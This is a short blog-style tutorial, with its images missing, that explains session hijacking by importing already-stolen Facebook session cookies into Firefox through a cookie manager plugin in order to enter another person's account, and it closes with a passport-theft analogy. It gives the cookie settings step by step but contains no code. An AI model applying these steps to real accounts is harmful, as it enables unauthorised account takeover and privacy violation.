Session hijacking: facebook.com example
First of all, session hijacking is a technique that steal the cookies from authenticated user, and lie to the server that you’re the authenticated user.
I’m going to show an example on how to get into the facebook account.
Assumption: I already have the authenticated cookies on my hand.
I still think that Firefox is the best browser ever for developer.
You can see the Facebook login page now. Now I need to import the cookies into here.
But before that, please download Advanced Cookie Manager plugin fo Firefox.
Go to Manage Cookies menu, select “facebook.com” in the Domain there. Now you can see a few cookies here.
See the box I highlighted? Facebook use https, so httpOnly choose
false, isSecure choose
true and isSession also
true. These are session cookies.
Now will be like this.
Refresh the page, and now…
The concept is like you want to go to foreign country, but you don’t have a passport. Now you steal/get the passport from someone (ignore the passport photo, just an example here). Now you tell the custom that you’re actually the someone, and you’ll get pass.